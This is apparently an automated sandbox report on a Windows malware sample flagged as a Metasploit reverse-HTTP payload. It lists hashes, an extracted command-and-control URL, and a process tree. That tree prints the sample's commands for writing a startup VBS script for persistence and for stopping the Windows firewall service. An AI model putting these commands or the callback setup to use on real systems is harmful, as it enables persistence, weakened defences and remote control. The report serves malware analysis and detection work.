Analysis
-
max time kernel
150s -
max time network
91s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
29-12-2020 17:03
Static task
static1
Behavioral task
behavioral1
Sample
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
Resource
win10v20201028
General
-
Target
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe
-
Size
199KB
-
MD5
5b5e120a4cf6fd359750b10a3afe5dd1
-
SHA1
d54e0bb8305f468797fd03f22d64edef03fd65f3
-
SHA256
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015
-
SHA512
a4e87629cb12aec6b7d280877210c241e5d9c129b099473ad3c54f2ba0ef6686d940ce8ffb9d65d2b5980e4a2441c87511d61b8fa600f63c26146b0739c6eb46
Malware Config
Extracted
metasploit
windows/reverse_http
http://thedonald.win:443/t6pNyjKhMouuSa9I8aNlOQxTWalk1ZSCWvqscRqnGo-36PO2VBgdduQJebUNp8cgFO03Hha7yXrD9Q8hF5KFjWFydleor9rJO_IdHjJYnwDz3V3CD1ZzbMGMIRgBfd4oD91ekmuH9O36BFxS-ApQa4m-JXlszaAFF92RuNpJlwnOZQaIE
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Executes dropped EXE 1 IoCs
Processes:
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exepid process 1444 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe upx C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe upx -
Drops startup file 1 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exepid process 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exedescription pid process target process PID 1084 set thread context of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exepid process 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exepid process 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.execmd.exenet.exedescription pid process target process PID 1084 wrote to memory of 1352 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1352 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1352 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1352 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1504 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1504 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1504 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1504 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe cmd.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1084 wrote to memory of 1444 1084 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe 9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe PID 1504 wrote to memory of 1660 1504 cmd.exe net.exe PID 1504 wrote to memory of 1660 1504 cmd.exe net.exe PID 1504 wrote to memory of 1660 1504 cmd.exe net.exe PID 1504 wrote to memory of 1660 1504 cmd.exe net.exe PID 1660 wrote to memory of 268 1660 net.exe net1.exe PID 1660 wrote to memory of 268 1660 net.exe net1.exe PID 1660 wrote to memory of 268 1660 net.exe net1.exe PID 1660 wrote to memory of 268 1660 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe"C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"2⤵
- Drops startup file
-
C:\Windows\SysWOW64\cmd.exe/c net stop MpsSvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe"C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exe"2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exeMD5
5b5e120a4cf6fd359750b10a3afe5dd1
SHA1d54e0bb8305f468797fd03f22d64edef03fd65f3
SHA2569fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015
SHA512a4e87629cb12aec6b7d280877210c241e5d9c129b099473ad3c54f2ba0ef6686d940ce8ffb9d65d2b5980e4a2441c87511d61b8fa600f63c26146b0739c6eb46
-
\Users\Admin\AppData\Local\Temp\9fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015.exeMD5
5b5e120a4cf6fd359750b10a3afe5dd1
SHA1d54e0bb8305f468797fd03f22d64edef03fd65f3
SHA2569fb70c001307ee5f60eff1a9d9f5903ef909ddde5526cbe85a143d2fa6f51015
SHA512a4e87629cb12aec6b7d280877210c241e5d9c129b099473ad3c54f2ba0ef6686d940ce8ffb9d65d2b5980e4a2441c87511d61b8fa600f63c26146b0739c6eb46
-
memory/268-11-0x0000000000000000-mapping.dmp
-
memory/1352-2-0x0000000000000000-mapping.dmp
-
memory/1444-5-0x0000000000400000-0x0000000000C98000-memory.dmpFilesize
8.6MB
-
memory/1444-6-0x00000000004010A1-mapping.dmp
-
memory/1444-8-0x00000000004010A1-mapping.dmp
-
memory/1444-9-0x0000000000400000-0x0000000000C98000-memory.dmpFilesize
8.6MB
-
memory/1504-3-0x0000000000000000-mapping.dmp
-
memory/1660-10-0x0000000000000000-mapping.dmp